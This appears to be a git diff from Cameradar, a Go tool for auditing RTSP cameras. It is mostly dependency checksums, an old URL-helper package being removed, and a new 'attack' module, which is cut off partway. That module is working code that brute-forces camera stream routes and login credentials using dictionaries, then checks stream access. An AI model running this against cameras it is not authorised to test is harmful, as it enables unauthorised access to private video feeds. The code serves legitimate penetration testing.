github.com/valyala/histogram v1.2.0 h1:wyYGAZZt3CpwUiIb9AU/Zbllg1llXyrtApRS815OLoQ=
|
||||
github.com/valyala/histogram v1.2.0/go.mod h1:Hb4kBwb4UxsaNbbbh+RRz8ZR6pdodR57tzWUS3BUzXY=
|
||||
github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e h1:JVG44RsyaB9T2KIHavMF/ppJZNG9ZpyihvCd0w101no=
|
||||
github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e/go.mod h1:RbqR21r5mrJuqunuUZ/Dhy/avygyECGrLceyNeo4LiM=
|
||||
github.com/yusufpapurcu/wmi v1.2.3 h1:E1ctvB7uKFMOJw3fdOW32DwGE9I7t++CRUEMKvFoFiw=
|
||||
github.com/yusufpapurcu/wmi v1.2.3/go.mod h1:SBZ9tNy3G9/m5Oi98Zks0QjeHVDvuK0qfxQmPyzfmi0=
|
||||
go.opentelemetry.io/auto/sdk v1.2.1 h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64=
|
||||
go.opentelemetry.io/auto/sdk v1.2.1/go.mod h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y=
|
||||
go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.49.0 h1:jq9TW8u3so/bN+JPT166wjOI6/vQPF6Xe7nMNIltagk=
|
||||
go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.49.0/go.mod h1:p8pYQP+m5XfbZm9fxtSKAbM6oIllS7s2AfxrChvc7iw=
|
||||
go.opentelemetry.io/otel v1.38.0 h1:RkfdswUDRimDg0m2Az18RKOsnI8UDzppJAtj01/Ymk8=
|
||||
go.opentelemetry.io/otel v1.38.0/go.mod h1:zcmtmQ1+YmQM9wrNsTGV/q/uyusom3P8RxwExxkZhjM=
|
||||
go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.38.0 h1:GqRJVj7UmLjCVyVJ3ZFLdPRmhDUp2zFmQe3RHIOsw24=
|
||||
go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.38.0/go.mod h1:ri3aaHSmCTVYu2AWv44YMauwAQc0aqI9gHKIcSbI1pU=
|
||||
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc v1.38.0 h1:lwI4Dc5leUqENgGuQImwLo4WnuXFPetmPpkLi2IrX54=
|
||||
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc v1.38.0/go.mod h1:Kz/oCE7z5wuyhPxsXDuaPteSWqjSBD5YaSdbxZYGbGk=
|
||||
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.38.0 h1:aTL7F04bJHUlztTsNGJ2l+6he8c+y/b//eR0jjjemT4=
|
||||
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.38.0/go.mod h1:kldtb7jDTeol0l3ewcmd8SDvx3EmIE7lyvqbasU3QC4=
|
||||
go.opentelemetry.io/otel/exporters/zipkin v1.38.0 h1:0rJ2TmzpHDG+Ib9gPmu3J3cE0zXirumQcKS4wCoZUa0=
|
||||
go.opentelemetry.io/otel/exporters/zipkin v1.38.0/go.mod h1:Su/nq/K5zRjDKKC3Il0xbViE3juWgG3JDoqLumFx5G0=
|
||||
go.opentelemetry.io/otel/metric v1.38.0 h1:Kl6lzIYGAh5M159u9NgiRkmoMKjvbsKtYRwgfrA6WpA=
|
||||
go.opentelemetry.io/otel/metric v1.38.0/go.mod h1:kB5n/QoRM8YwmUahxvI3bO34eVtQf2i4utNVLr9gEmI=
|
||||
go.opentelemetry.io/otel/sdk v1.38.0 h1:l48sr5YbNf2hpCUj/FoGhW9yDkl+Ma+LrVl8qaM5b+E=
|
||||
go.opentelemetry.io/otel/sdk v1.38.0/go.mod h1:ghmNdGlVemJI3+ZB5iDEuk4bWA3GkTpW+DOoZMYBVVg=
|
||||
go.opentelemetry.io/otel/sdk/metric v1.38.0 h1:aSH66iL0aZqo//xXzQLYozmWrXxyFkBJ6qT5wthqPoM=
|
||||
go.opentelemetry.io/otel/sdk/metric v1.38.0/go.mod h1:dg9PBnW9XdQ1Hd6ZnRz689CbtrUp0wMMs9iPcgT9EZA=
|
||||
go.opentelemetry.io/otel/trace v1.38.0 h1:Fxk5bKrDZJUH+AMyyIXGcFAPah0oRcT+LuNtJrmcNLE=
|
||||
go.opentelemetry.io/otel/trace v1.38.0/go.mod h1:j1P9ivuFsTceSWe1oY+EeW3sc+Pp42sO++GHkg4wwhs=
|
||||
go.opentelemetry.io/proto/otlp v1.8.0 h1:fRAZQDcAFHySxpJ1TwlA1cJ4tvcrw7nXl9xWWC8N5CE=
|
||||
go.opentelemetry.io/proto/otlp v1.8.0/go.mod h1:tIeYOeNBU4cvmPqpaji1P+KbB4Oloai8wN4rWzRrFF0=
|
||||
go.uber.org/goleak v1.3.0 h1:2K3zAYmnTNqV73imy9J1T3WC+gmCePx2hEGkimedGto=
|
||||
go.uber.org/goleak v1.3.0/go.mod h1:CoHD4mav9JJNrW/WLlf7HGZPjdw8EucARQHekz1X6bE=
|
||||
go.yaml.in/yaml/v2 v2.4.2 h1:DzmwEr2rDGHl7lsFgAHxmNz/1NlQ7xLIrlN2h5d1eGI=
|
||||
go.yaml.in/yaml/v2 v2.4.2/go.mod h1:081UH+NErpNdqlCXm3TtEran0rJZGxAYx9hb/ELlsPU=
|
||||
golang.org/x/crypto v0.47.0 h1:V6e3FRj+n4dbpw86FJ8Fv7XVOql7TEwpHapKoMJ/GO8=
|
||||
golang.org/x/crypto v0.47.0/go.mod h1:ff3Y9VzzKbwSSEzWqJsJVBnWmRwRSHt/6Op5n9bQc4A=
|
||||
golang.org/x/exp v0.0.0-20220909182711-5c715a9e8561 h1:MDc5xs78ZrZr3HMQugiXOAkSZtfTpbJLDr/lwfgO53E=
|
||||
golang.org/x/exp v0.0.0-20220909182711-5c715a9e8561/go.mod h1:cyybsKvd6eL0RnXn6p/Grxp8F5bW7iYuBgsNCOHpMYE=
|
||||
golang.org/x/mod v0.31.0 h1:HaW9xtz0+kOcWKwli0ZXy79Ix+UW/vOfmWI5QVd2tgI=
|
||||
golang.org/x/mod v0.31.0/go.mod h1:43JraMp9cGx1Rx3AqioxrbrhNsLl2l/iNAvuBkrezpg=
|
||||
golang.org/x/net v0.49.0 h1:eeHFmOGUTtaaPSGNmjBKpbng9MulQsJURQUAfUwY++o=
|
||||
golang.org/x/net v0.49.0/go.mod h1:/ysNB2EvaqvesRkuLAyjI1ycPZlQHM3q01F02UY/MV8=
|
||||
golang.org/x/sync v0.19.0 h1:vV+1eWNmZ5geRlYjzm2adRgW2/mcpevXNg50YZtPCE4=
|
||||
golang.org/x/sync v0.19.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI=
|
||||
golang.org/x/sys v0.0.0-20210809222454-d867a43fc93e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.40.0 h1:DBZZqJ2Rkml6QMQsZywtnjnnGvHza6BTfYFWY9kjEWQ=
|
||||
golang.org/x/sys v0.40.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
|
||||
golang.org/x/term v0.39.0 h1:RclSuaJf32jOqZz74CkPA9qFuVTX7vhLlpfj/IGWlqY=
|
||||
golang.org/x/term v0.39.0/go.mod h1:yxzUCTP/U+FzoxfdKmLaA0RV1WgE0VY7hXBwKtY/4ww=
|
||||
golang.org/x/text v0.33.0 h1:B3njUFyqtHDUI5jMn1YIr5B0IE2U0qck04r6d4KPAxE=
|
||||
golang.org/x/text v0.33.0/go.mod h1:LuMebE6+rBincTi9+xWTY8TztLzKHc/9C1uBCG27+q8=
|
||||
golang.org/x/tools v0.40.0 h1:yLkxfA+Qnul4cs9QA3KnlFu0lVmd8JJfoq+E41uSutA=
|
||||
golang.org/x/tools v0.40.0/go.mod h1:Ik/tzLRlbscWpqqMRjyWYDisX8bG13FrdXp3o4Sr9lc=
|
||||
gonum.org/v1/gonum v0.16.0 h1:5+ul4Swaf3ESvrOnidPp4GZbzf0mxVQpDCYUQE7OJfk=
|
||||
gonum.org/v1/gonum v0.16.0/go.mod h1:fef3am4MQ93R2HHpKnLk4/Tbh/s0+wqD5nfa6Pnwy4E=
|
||||
google.golang.org/genproto/googleapis/api v0.0.0-20250908214217-97024824d090 h1:d8Nakh1G+ur7+P3GcMjpRDEkoLUcLW2iU92XVqR+XMQ=
|
||||
google.golang.org/genproto/googleapis/api v0.0.0-20250908214217-97024824d090/go.mod h1:U8EXRNSd8sUYyDfs/It7KVWodQr+Hf9xtxyxWudSwEw=
|
||||
google.golang.org/genproto/googleapis/rpc v0.0.0-20250908214217-97024824d090 h1:/OQuEa4YWtDt7uQWHd3q3sUMb+QOLQUg1xa8CEsRv5w=
|
||||
google.golang.org/genproto/googleapis/rpc v0.0.0-20250908214217-97024824d090/go.mod h1:GmFNa4BdJZ2a8G+wCe9Bg3wwThLrJun751XstdJt5Og=
|
||||
google.golang.org/grpc v1.75.1 h1:/ODCNEuf9VghjgO3rqLcfg8fiOP0nSluljWFlDxELLI=
|
||||
google.golang.org/grpc v1.75.1/go.mod h1:JtPAzKiq4v1xcAB2hydNlWI2RnF85XXcV0mhKXr2ecQ=
|
||||
google.golang.org/protobuf v1.36.9 h1:w2gp2mA27hUeUzj9Ex9FBjsBm40zfaDtEWow293U7Iw=
|
||||
google.golang.org/protobuf v1.36.9/go.mod h1:fuxRtAxBytpl4zzqUh6/eyUujkJdNiuEkXntxiD/uRU=
|
||||
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
|
||||
gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk=
|
||||
gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q=
|
||||
gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
|
||||
gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
|
||||
-27
@@ -1,27 +0,0 @@
|
||||
package cmrdr
|
||||
|
||||
import "fmt"
|
||||
|
||||
func replace(streams []Stream, new Stream) []Stream {
|
||||
updatedSlice := streams[:0]
|
||||
|
||||
for _, old := range streams {
|
||||
if old.Address == new.Address && old.Port == new.Port {
|
||||
updatedSlice = append(updatedSlice, new)
|
||||
} else {
|
||||
updatedSlice = append(updatedSlice, old)
|
||||
}
|
||||
}
|
||||
|
||||
return updatedSlice
|
||||
}
|
||||
|
||||
// GetCameraRTSPURL generates a stream's RTSP URL
|
||||
func GetCameraRTSPURL(stream Stream) string {
|
||||
return "rtsp://" + stream.Username + ":" + stream.Password + "@" + stream.Address + ":" + fmt.Sprint(stream.Port) + "/" + stream.Route
|
||||
}
|
||||
|
||||
// GetCameraAdminPanelURL returns the URL to the camera's admin panel
|
||||
func GetCameraAdminPanelURL(stream Stream) string {
|
||||
return "http://" + stream.Address + "/"
|
||||
}
|
||||
-111
@@ -1,111 +0,0 @@
|
||||
package cmrdr
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"github.com/stretchr/testify/assert"
|
||||
)
|
||||
|
||||
func TestReplace(t *testing.T) {
|
||||
validStream1 := Stream{
|
||||
Device: "fakeDevice",
|
||||
Address: "fakeAddress",
|
||||
Port: 1337,
|
||||
}
|
||||
|
||||
validStream2 := Stream{
|
||||
Device: "fakeDevice",
|
||||
Address: "differentFakeAddress",
|
||||
Port: 1337,
|
||||
}
|
||||
|
||||
invalidStreamNoPort := Stream{
|
||||
Device: "invalidDevice",
|
||||
Address: "fakeAddress",
|
||||
Port: 0,
|
||||
}
|
||||
|
||||
invalidStreamNoPortModified := Stream{
|
||||
Device: "updatedDevice",
|
||||
Address: "fakeAddress",
|
||||
Port: 1337,
|
||||
}
|
||||
|
||||
testCases := []struct {
|
||||
streams []Stream
|
||||
newStream Stream
|
||||
|
||||
expectedStreams []Stream
|
||||
}{
|
||||
// Valid baseline
|
||||
{
|
||||
streams: []Stream{validStream1, validStream2, invalidStreamNoPort},
|
||||
newStream: invalidStreamNoPortModified,
|
||||
|
||||
expectedStreams: []Stream{validStream1, validStream2, invalidStreamNoPortModified},
|
||||
},
|
||||
}
|
||||
for _, test := range testCases {
|
||||
streams := replace(test.streams, test.newStream)
|
||||
|
||||
for _, stream := range test.streams {
|
||||
foundStream := false
|
||||
for _, result := range streams {
|
||||
if result.Address == stream.Address && result.Device == stream.Device && result.Port == stream.Port {
|
||||
foundStream = true
|
||||
}
|
||||
}
|
||||
assert.Equal(t, true, foundStream, "wrong streams parsed")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetCameraRTSPURL(t *testing.T) {
|
||||
validStream := Stream{
|
||||
Address: "1.2.3.4",
|
||||
Username: "ullaakut",
|
||||
Password: "ba69897483886f0d2b0afb6345b76c0c",
|
||||
Route: "cameradar.sdp",
|
||||
Port: 1337,
|
||||
}
|
||||
|
||||
testCases := []struct {
|
||||
stream Stream
|
||||
|
||||
expectedRTSPURL string
|
||||
}{
|
||||
// Valid baseline
|
||||
{
|
||||
stream: validStream,
|
||||
|
||||
expectedRTSPURL: "rtsp://ullaakut:ba69897483886f0d2b0afb6345b76c0c@1.2.3.4:1337/cameradar.sdp",
|
||||
},
|
||||
}
|
||||
for _, test := range testCases {
|
||||
output := GetCameraRTSPURL(test.stream)
|
||||
assert.Equal(t, test.expectedRTSPURL, output, "wrong RTSP URL generated")
|
||||
}
|
||||
}
|
||||
|
||||
func TestGetCameraAdminPanelURL(t *testing.T) {
|
||||
validStream := Stream{
|
||||
Address: "1.2.3.4",
|
||||
}
|
||||
|
||||
testCases := []struct {
|
||||
stream Stream
|
||||
|
||||
expectedRTSPURL string
|
||||
}{
|
||||
// Valid baseline
|
||||
{
|
||||
stream: validStream,
|
||||
|
||||
expectedRTSPURL: "http://1.2.3.4/",
|
||||
},
|
||||
}
|
||||
for _, test := range testCases {
|
||||
output := GetCameraAdminPanelURL(test.stream)
|
||||
assert.Equal(t, test.expectedRTSPURL, output, "wrong Admin Panel URL generated")
|
||||
}
|
||||
}
|
||||
Binary file not shown.
|
Before Width: | Height: | Size: 3.8 MiB |
Binary file not shown.
|
Before Width: | Height: | Size: 220 KiB After Width: | Height: | Size: 746 KiB |
Binary file not shown.
|
Before Width: | Height: | Size: 308 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 1.5 MiB |
@@ -0,0 +1,438 @@
|
||||
package attack
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"fmt"
|
||||
"time"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/bluenviron/gortsplib/v5"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/base"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/description"
|
||||
"github.com/bluenviron/gortsplib/v5/pkg/liberrors"
|
||||
)
|
||||
|
||||
// Route that should never be a constructor default.
|
||||
const dummyRoute = "0x8b6c42"
|
||||
|
||||
// Dictionary provides dictionaries for routes, usernames and passwords.
|
||||
type Dictionary interface {
|
||||
Routes() []string
|
||||
Usernames() []string
|
||||
Passwords() []string
|
||||
}
|
||||
|
||||
// Reporter reports progress and results of the attacks.
|
||||
type Reporter interface {
|
||||
Start(step cameradar.Step, message string)
|
||||
Done(step cameradar.Step, message string)
|
||||
Progress(step cameradar.Step, message string)
|
||||
Error(step cameradar.Step, err error)
|
||||
Debug(step cameradar.Step, message string)
|
||||
}
|
||||
|
||||
// Attacker attempts to discover routes and credentials for RTSP streams.
|
||||
type Attacker struct {
|
||||
dictionary Dictionary
|
||||
reporter Reporter
|
||||
attackInterval time.Duration
|
||||
timeout time.Duration
|
||||
}
|
||||
|
||||
// New builds an Attacker with the provided dependencies.
|
||||
func New(dict Dictionary, attackInterval, timeout time.Duration, reporter Reporter) (Attacker, error) {
|
||||
if dict == nil {
|
||||
return Attacker{}, errors.New("dictionary is required")
|
||||
}
|
||||
|
||||
return Attacker{
|
||||
dictionary: dict,
|
||||
attackInterval: attackInterval,
|
||||
timeout: timeout,
|
||||
reporter: reporter,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Attack attacks the given targets and returns the accessed streams.
|
||||
func (a Attacker) Attack(ctx context.Context, targets []cameradar.Stream) ([]cameradar.Stream, error) {
|
||||
if len(targets) == 0 {
|
||||
return nil, errors.New("no stream found")
|
||||
}
|
||||
|
||||
streams, err := a.attackRoutesPhase(ctx, targets)
|
||||
if err != nil {
|
||||
return streams, err
|
||||
}
|
||||
|
||||
streams, err = a.detectAuthPhase(ctx, streams)
|
||||
if err != nil {
|
||||
return streams, err
|
||||
}
|
||||
|
||||
streams, err = a.attackCredentialsPhase(ctx, streams)
|
||||
if err != nil {
|
||||
return streams, err
|
||||
}
|
||||
|
||||
streams, err = a.validateStreamsPhase(ctx, streams)
|
||||
if err != nil {
|
||||
return streams, err
|
||||
}
|
||||
|
||||
// Some cameras run an inaccurate version of the RTSP protocol which prioritizes 401 over 404.
|
||||
// For these cameras, running another route attack solves the problem.
|
||||
if !needsReattack(streams) {
|
||||
return streams, nil
|
||||
}
|
||||
streams, err = a.reattackRoutes(ctx, streams)
|
||||
if err != nil {
|
||||
return streams, err
|
||||
}
|
||||
|
||||
return streams, nil
|
||||
}
|
||||
|
||||
func (a Attacker) attackRoutesPhase(ctx context.Context, targets []cameradar.Stream) ([]cameradar.Stream, error) {
|
||||
a.reporter.Start(cameradar.StepAttackRoutes, "Attacking RTSP routes")
|
||||
routeAttempts := (len(a.dictionary.Routes()) + 1) * len(targets)
|
||||
if routeAttempts > 0 {
|
||||
a.reporter.Progress(cameradar.StepAttackRoutes, cameradar.ProgressTotalMessage(routeAttempts))
|
||||
}
|
||||
|
||||
streams, err := runParallel(ctx, targets, func(ctx context.Context, target cameradar.Stream) (cameradar.Stream, error) {
|
||||
return a.attackRoutesForStream(ctx, target, true)
|
||||
})
|
||||
if err != nil {
|
||||
a.reporter.Error(cameradar.StepAttackRoutes, err)
|
||||
return streams, fmt.Errorf("attacking routes: %w", err)
|
||||
}
|
||||
updateSummary(a.reporter, streams)
|
||||
a.reporter.Done(cameradar.StepAttackRoutes, "Finished route attacks")
|
||||
|
||||
return streams, nil
|
||||
}
|
||||
|
||||
func (a Attacker) detectAuthPhase(ctx context.Context, streams []cameradar.Stream) ([]cameradar.Stream, error) {
|
||||
a.reporter.Start(cameradar.StepDetectAuth, "Detecting authentication methods")
|
||||
if len(streams) > 0 {
|
||||
a.reporter.Progress(cameradar.StepDetectAuth, cameradar.ProgressTotalMessage(len(streams)))
|
||||
}
|
||||
streams, err := a.detectAuthMethods(ctx, streams)
|
||||
if err != nil {
|
||||
a.reporter.Error(cameradar.StepDetectAuth, err)
|
||||
return streams, fmt.Errorf("detecting authentication methods: %w", err)
|
||||
}
|
||||
updateSummary(a.reporter, streams)
|
||||
a.reporter.Done(cameradar.StepDetectAuth, "Authentication detection complete")
|
||||
|
||||
return streams, nil
|
||||
}
|
||||
|
||||
func (a Attacker) attackCredentialsPhase(ctx context.Context, streams []cameradar.Stream) ([]cameradar.Stream, error) {
|
||||
a.reporter.Start(cameradar.StepAttackCredentials, "Attacking credentials")
|
||||
credentialsAttempts := len(streams) * len(a.dictionary.Usernames()) * len(a.dictionary.Passwords())
|
||||
if credentialsAttempts > 0 {
|
||||
a.reporter.Progress(cameradar.StepAttackCredentials, cameradar.ProgressTotalMessage(credentialsAttempts))
|
||||
}
|
||||
streams, err := runParallel(ctx, streams, a.attackCredentialsForStream)
|
||||
if err != nil {
|
||||
a.reporter.Error(cameradar.StepAttackCredentials, err)
|
||||
return streams, fmt.Errorf("attacking credentials: %w", err)
|
||||
}
|
||||
updateSummary(a.reporter, streams)
|
||||
a.reporter.Done(cameradar.StepAttackCredentials, "Credential attacks complete")
|
||||
|
||||
return streams, nil
|
||||
}
|
||||
|
||||
func (a Attacker) validateStreamsPhase(ctx context.Context, streams []cameradar.Stream) ([]cameradar.Stream, error) {
|
||||
a.reporter.Start(cameradar.StepValidateStreams, "Validating streams")
|
||||
if len(streams) > 0 {
|
||||
a.reporter.Progress(cameradar.StepValidateStreams, cameradar.ProgressTotalMessage(len(streams)))
|
||||
}
|
||||
streams, err := runParallel(ctx, streams, func(ctx context.Context, target cameradar.Stream) (cameradar.Stream, error) {
|
||||
return a.validateStream(ctx, target, true)
|
||||
})
|
||||
if err != nil {
|
||||
a.reporter.Error(cameradar.StepValidateStreams, err)
|
||||
return streams, fmt.Errorf("validating streams: %w", err)
|
||||
}
|
||||
updateSummary(a.reporter, streams)
|
||||
a.reporter.Done(cameradar.StepValidateStreams, "Stream validation complete")
|
||||
|
||||
return streams, nil
|
||||
}
|
||||
|
||||
func (a Attacker) reattackRoutes(ctx context.Context, streams []cameradar.Stream) ([]cameradar.Stream, error) {
|
||||
a.reporter.Progress(cameradar.StepAttackRoutes, "Re-attacking routes for partial results")
|
||||
updated, err := runParallel(ctx, streams, func(ctx context.Context, target cameradar.Stream) (cameradar.Stream, error) {
|
||||
return a.attackRoutesForStream(ctx, target, false)
|
||||
})
|
||||
if err != nil {
|
||||
a.reporter.Error(cameradar.StepAttackRoutes, err)
|
||||
return streams, fmt.Errorf("attacking routes: %w", err)
|
||||
}
|
||||
|
||||
updated, err = runParallel(ctx, updated, func(ctx context.Context, target cameradar.Stream) (cameradar.Stream, error) {
|
||||
return a.validateStream(ctx, target, false)
|
||||
})
|
||||
if err != nil {
|
||||
a.reporter.Error(cameradar.StepValidateStreams, err)
|
||||
return updated, fmt.Errorf("validating streams: %w", err)
|
||||
}
|
||||
updateSummary(a.reporter, updated)
|
||||
|
||||
return updated, nil
|
||||
}
|
||||
|
||||
func needsReattack(streams []cameradar.Stream) bool {
|
||||
for _, stream := range streams {
|
||||
if stream.RouteFound && stream.CredentialsFound && stream.Available {
|
||||
// This stream is fully discovered, no need to re-attack.
|
||||
continue
|
||||
}
|
||||
return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
type summaryUpdater interface {
|
||||
UpdateSummary(streams []cameradar.Stream)
|
||||
}
|
||||
|
||||
func updateSummary(reporter Reporter, streams []cameradar.Stream) {
|
||||
updater, ok := reporter.(summaryUpdater)
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
updater.UpdateSummary(streams)
|
||||
}
|
||||
|
||||
func (a Attacker) attackCredentialsForStream(ctx context.Context, target cameradar.Stream) (cameradar.Stream, error) {
|
||||
for _, username := range a.dictionary.Usernames() {
|
||||
for _, password := range a.dictionary.Passwords() {
|
||||
if ctx.Err() != nil {
|
||||
return target, ctx.Err()
|
||||
}
|
||||
|
||||
a.reporter.Progress(cameradar.StepAttackCredentials, cameradar.ProgressTickMessage())
|
||||
ok, err := a.credAttack(target, username, password)
|
||||
if err != nil {
|
||||
target.CredentialsFound = false
|
||||
|
||||
msg := fmt.Sprintf("credential attempt failed for %s:%d (%s:%s): %v", target.Address.String(), target.Port, username, password, err)
|
||||
a.reporter.Debug(cameradar.StepAttackCredentials, msg)
|
||||
|
||||
return target, nil
|
||||
}
|
||||
|
||||
if ok {
|
||||
target.CredentialsFound = true
|
||||
target.Username = username
|
||||
target.Password = password
|
||||
|
||||
msg := fmt.Sprintf("Credentials found for %s:%d", target.Address.String(), target.Port)
|
||||
a.reporter.Progress(cameradar.StepAttackCredentials, msg)
|
||||
|
||||
return target, nil
|
||||
}
|
||||
time.Sleep(a.attackInterval)
|
||||
}
|
||||
}
|
||||
|
||||
target.CredentialsFound = false
|
||||
return target, nil
|
||||
}
|
||||
|
||||
func (a Attacker) attackRoutesForStream(ctx context.Context, target cameradar.Stream, emitProgress bool) (cameradar.Stream, error) {
|
||||
if target.RouteFound {
|
||||
return target, nil
|
||||
}
|
||||
|
||||
if emitProgress {
|
||||
a.reporter.Progress(cameradar.StepAttackRoutes, cameradar.ProgressTickMessage())
|
||||
}
|
||||
ok, err := a.routeAttack(target, dummyRoute)
|
||||
if err != nil {
|
||||
a.reporter.Debug(cameradar.StepAttackRoutes, fmt.Sprintf("route probe failed for %s:%d: %v", target.Address.String(), target.Port, err))
|
||||
return target, nil
|
||||
}
|
||||
if ok {
|
||||
target.RouteFound = true
|
||||
target.Routes = append(target.Routes, "") // Add empty route for default.
|
||||
a.reporter.Progress(cameradar.StepAttackRoutes, fmt.Sprintf("Default route accepted for %s:%d", target.Address.String(), target.Port))
|
||||
return target, nil
|
||||
}
|
||||
|
||||
for _, route := range a.dictionary.Routes() {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return target, ctx.Err()
|
||||
case <-time.After(a.attackInterval):
|
||||
}
|
||||
|
||||
if emitProgress {
|
||||
a.reporter.Progress(cameradar.StepAttackRoutes, cameradar.ProgressTickMessage())
|
||||
}
|
||||
ok, err := a.routeAttack(target, route)
|
||||
if err != nil {
|
||||
a.reporter.Debug(cameradar.StepAttackRoutes, fmt.Sprintf("route attempt failed for %s:%d (%s): %v", target.Address.String(), target.Port, route, err))
|
||||
return target, nil
|
||||
}
|
||||
if ok {
|
||||
target.RouteFound = true
|
||||
target.Routes = append(target.Routes, route)
|
||||
a.reporter.Progress(cameradar.StepAttackRoutes, fmt.Sprintf("Route found for %s:%d -> %s", target.Address.String(), target.Port, route))
|
||||
}
|
||||
}
|
||||
|
||||
return target, nil
|
||||
}
|
||||
|
||||
func (a Attacker) routeAttack(stream cameradar.Stream, route string) (bool, error) {
|
||||
u, urlStr, err := buildRTSPURL(stream, route, stream.Username, stream.Password)
|
||||
if err != nil {
|
||||
return false, fmt.Errorf("building rtsp url: %w", err)
|
||||
}
|
||||
|
||||
code, err := a.describeStatus(u)
|
||||
if err != nil {
|
||||
return false, fmt.Errorf("performing describe request at %q: %w", urlStr, err)
|
||||
}
|
||||
|
||||
a.reporter.Debug(cameradar.StepAttackRoutes, fmt.Sprintf("DESCRIBE %s RTSP/1.0 > %d", urlStr, code))
|
||||
access := code == base.StatusOK || code == base.StatusUnauthorized || code == base.StatusForbidden
|
||||
return access, nil
|
||||
}
|
||||
|
||||
func (a Attacker) credAttack(stream cameradar.Stream, username, password string) (bool, error) {
|
||||
u, urlStr, err := buildRTSPURL(stream, stream.Route(), username, password)
|
||||
if err != nil {
|
||||
return false, fmt.Errorf("building rtsp url: %w", err)
|
||||
}
|
||||
|
||||
code, err := a.describeStatus(u)
|
||||
if err != nil {
|
||||
return false, fmt.Errorf("performing describe request at %q: %w", urlStr, err)
|
||||
}
|
||||
|
||||
a.reporter.Debug(cameradar.StepAttackCredentials, fmt.Sprintf("DESCRIBE %s RTSP/1.0 > %d", urlStr, code))
|
||||
return code == base.StatusOK || code == base.StatusNotFound, nil
|
||||
}
|
||||
|
||||
func (a Attacker) validateStream(ctx context.Context, stream cameradar.Stream, emitProgress bool) (cameradar.Stream, error) {
|
||||
if emitProgress {
|
||||
defer a.reporter.Progress(cameradar.StepValidateStreams, cameradar.ProgressTickMessage())
|
||||
}
|
||||
|
||||
if ctx.Err() != nil {
|
||||
return stream, ctx.Err()
|
||||
}
|
||||
|
||||
u, urlStr, err := buildRTSPURL(stream, stream.Route(), stream.Username, stream.Password)
|
||||
if err != nil {
|
||||
return stream, fmt.Errorf("building rtsp url: %w", err)
|
||||
}
|
||||
|
||||
client, err := a.newRTSPClient(u)
|
||||
if err != nil {
|
||||
return stream, fmt.Errorf("starting rtsp client: %w", err)
|
||||
}
|
||||
defer client.Close()
|
||||
|
||||
desc, res, err := a.describeWithRetry(ctx, client, u, urlStr)
|
||||
if err != nil {
|
||||
return a.handleDescribeError(stream, urlStr, err)
|
||||
}
|
||||
a.logDescribeResponse(urlStr, res)
|
||||
|
||||
if desc == nil || len(desc.Medias) == 0 {
|
||||
return stream, fmt.Errorf("no media tracks found for %q", urlStr)
|
||||
}
|
||||
|
||||
res, err = client.Setup(desc.BaseURL, desc.Medias[0], 0, 0)
|
||||
if err != nil {
|
||||
return a.handleSetupError(stream, urlStr, err)
|
||||
}
|
||||
a.logSetupResponse(urlStr, res)
|
||||
|
||||
stream.Available = res != nil && res.StatusCode == base.StatusOK
|
||||
if stream.Available {
|
||||
a.reporter.Progress(cameradar.StepValidateStreams, fmt.Sprintf("Stream validated for %s:%d", stream.Address.String(), stream.Port))
|
||||
}
|
||||
|
||||
return stream, nil
|
||||
}
|
||||
|
||||
func (a Attacker) describeWithRetry(ctx context.Context, client *gortsplib.Client, u *base.URL, urlStr string) (*description.Session, *base.Response, error) {
|
||||
var (
|
||||
desc *description.Session
|
||||
res *base.Response
|
||||
err error
|
||||
)
|
||||
for range 5 {
|
||||
desc, res, err = client.Describe(u)
|
||||
if err == nil {
|
||||
return desc, res, nil
|
||||
}
|
||||
|
||||
var badStatus liberrors.ErrClientBadStatusCode
|
||||
if errors.As(err, &badStatus) && badStatus.Code == base.StatusServiceUnavailable {
|
||||
a.reporter.Debug(cameradar.StepValidateStreams, fmt.Sprintf("DESCRIBE %s RTSP/1.0 > %d (retrying)", urlStr, badStatus.Code))
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return nil, nil, ctx.Err()
|
||||
case <-time.After(time.Second):
|
||||
}
|
||||
continue
|
||||
}
